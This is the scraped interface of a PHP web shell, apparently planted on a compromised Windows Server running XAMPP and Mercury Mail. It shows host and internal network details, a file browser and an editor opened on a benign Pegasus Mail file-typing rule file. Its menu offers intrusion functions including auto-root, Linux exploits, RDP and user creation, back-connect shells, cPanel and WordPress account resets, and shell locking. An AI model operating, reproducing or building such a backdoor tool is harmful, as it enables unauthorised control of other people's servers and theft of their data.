Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
MercuryMail /
RESOURCE /
[ HOME SHELL ]
Name
Size
Permission
Action
autorplc.pm
20.19
KB
-rw-rw-rw-
basic.pnc
233
B
-rw-rw-rw-
basic.pnc.info
1.15
KB
-rw-rw-rw-
bpanel.txt
15.3
KB
-rw-rw-rw-
daemon.h
35.77
KB
-rw-rw-rw-
daemon.txt
100.31
KB
-rw-rw-rw-
filetype.pm
3.77
KB
-rw-rw-rw-
greeting.txt
2.05
KB
-rw-rw-rw-
helpdesk.pm5
1.42
KB
-rw-rw-rw-
listserv.pm5
1.01
KB
-rw-rw-rw-
mercuryb.htm
2.77
KB
-rw-rw-rw-
mime-map.pm
874
B
-rw-rw-rw-
order32.dll
193.5
KB
-rw-rw-rw-
order32.fff
3.32
KB
-rw-rw-rw-
poppass.dll
19.52
KB
-rw-rw-rw-
poppass.fff
2.89
KB
-rw-rw-rw-
poppass.txt
844
B
-rw-rw-rw-
ppass32.dll
57
KB
-rw-rw-rw-
ppass32.fff
2.91
KB
-rw-rw-rw-
prefix.pm
1.97
KB
-rw-rw-rw-
rasdial.zip
13.04
KB
-rw-rw-rw-
readme.1st
808
B
-rw-rw-rw-
rescom.exe
88
KB
-rwxrwxrwx
rquotes.r
2.23
KB
-rw-rw-rw-
spambust.dat
27.91
KB
-rw-rw-rw-
template.txt
20.43
KB
-rw-rw-rw-
template.zip
3.02
KB
-rw-rw-rw-
transflt.mer
4.73
KB
-rw-rw-rw-
winpmdde.txt
28.17
KB
-rw-rw-rw-
wpm-char.r
1.35
KB
-rw-rw-rw-
wpm-lmtt.r
23.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filetype.pm
; ; Pegasus Mail System, ; Copyright (c) 1990-97, David Harris, All Rights Reserved. ; ; File Typing Rules ; ; This file is used by Pegasus Mail to determine the "attachment type" ; information for files automatically. It consists of rules that can ; test a file's extension and any byte or strings in the first 512 ; bytes of the file. Each line contains the complete set of rules for ; a single type of file, in the following format: ; ; <file type>,<match type>,<operation>[,<operation>...] ; ; "file type" is the WinPMail "attachment type" string that ; should be used if a file matches this rule. ; ; "match type" is one of the following values: ; 0 : Match is good if any operation succeeds ; 1 : Match is only good if all operations succeed ; ; "operation" is one or more groups of three parameters in ; the following format: ; <opcode>,<offset>,<string> ; "opcode" is one of the following characters: ; X : match the file's extension ; B : match the single byte contained in "string" ; at offset "offset" in the file ; S : match the string contained in "string" starting ; at offset "offset" in the file ; R : match the string contained in "string" anywhere ; in the first 512 bytes of the file ; "offset" is the offset to start matching in the file. When ; "operation" is either X or R, it should be set to 0 ; "string" is the string or byte to match. It can be ASCII ; characters, or escapes in the form "\xxx", where "xxx" ; is exactly three decimal characters. ; ; Examples: ; MS-Word,0,X,0,.DOC ; - Returns "MS-Word" if the file's extension is ".DOC". ; ; PGP-Public-Key,0,R,0,BEGIN PGP PUBLIC ; - Returns "PGP-Public-Key" if the string "BEGIN PGP PUBLIC" ; appears anywhere in the first 512 bytes of the file. ; ; PCEXE,1,X,0,.EXE,S,0,MZ ; - Returns "PCEXE" if the file's extension is ".EXE" ; AND the first two characters in the file are "MZ". ; ; ZIP-Archive,0,X,0,.ZIP,S,0,PK\003 ; - Returns "ZIP-Archive" if the file's extension is ".ZIP" ; OR the first three characters are "PK" and an ASCII 3. ; ; The matching process ends on the first viable match. Because of this, ; if you have both a specific set of rules and a general set of rules ; for any single file type, you should always place the general rules ; after the specific rules in the file to allow more reliable matching. ; ; The parser for this file is inflexible - you must get the format ; right. Note in particular that whitespace is not permitted, or if it ; is present, it is assumed to be significant. The only valid delimiter ; in this file is a comma; the only way you can match a comma in a ; string is by using the escape "\044". ; ; Blank lines and lines in this file starting with ';' or '#' are ; regarded as comments and are ignored. ; MS-Word,1,S,0,\219\165\045 PCEXE,1,X,0,.EXE,S,0,MZ PCEXE,1,X,0,.DLL,S,0,MZ ZIP-archive,0,X,0,.ZIP,S,0,PK\003 MS-Richtext,0,X,0,.RTF,S,0,{\092rtf Program-source,0,X,0,.C,X,0,.H,X,0,.PAS,X,0,.RC,X,0,.CPP,X,0,.BAS,X,0,.ASM GIF-image,0,X,0,.GIF,S,0,GIF JPEG-image,0,X,0,.JPG,S,6,JFIF BMP-image,0,X,0,.BMP,X,0,.DIB,S,0,BM WAV-sound-file,1,S,0,RIFF,S,8,WAVE WAV-sound-file,0,X,0,.WAV WordPerfect,0,S,1,WPC Excel-sheet,0,X,0,.XLS Excel-chart,0,X,0,.XLC MS-Access,0,X,0,.MDB AVI-Movie,1,S,0,RIFF,S,8,AVI AVI-Movie,0,X,0,.AVI Windows-help,1,X,0,.HLP,S,0,?_\003 HTML-text,0,X,0,.HTM HTML-text,1,S,0,<HTML> PGP-Public-Key,0,R,0,BEGIN PGP PUBLIC PGP-encrypted,0,X,0,.PGP Text,0,X,0,.TXT
Close